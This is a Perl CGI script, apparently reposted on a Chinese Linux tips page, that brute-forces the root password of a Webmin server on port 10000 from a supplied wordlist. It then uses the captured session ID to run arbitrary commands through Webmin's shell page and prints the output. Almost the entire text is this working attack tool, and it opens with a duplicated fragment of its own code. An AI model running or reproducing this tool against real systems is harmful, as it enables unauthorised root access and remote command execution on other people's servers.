>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; } else { print $answer; print results "[+]$answer\n"; } } } } #!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~Webmin Web Brute Force v1.5 - cgi versiyon Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist\r\n"; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/\n". "Cookie: testing=1\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: __\n". "\n". $pass_line."\n\n"; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution\n"; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"cmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pwd\"\n". "\n". "/root\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"history\"\n". "\n". "\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"previous\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pcmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604--\n\n"; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/shell/\n". "Cookie: sid=$sid\; testing=1; x\n". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n". "Content-Length: siz\n". "\n". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/ >/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; } else { print $answer; } } } } } if($atak eq ""){ print qq~~;
[火星人 ] Webmin 暴力破解+ 執行命令已經有717次圍觀
http://coctec.com/docs/linux/show-post-136664.html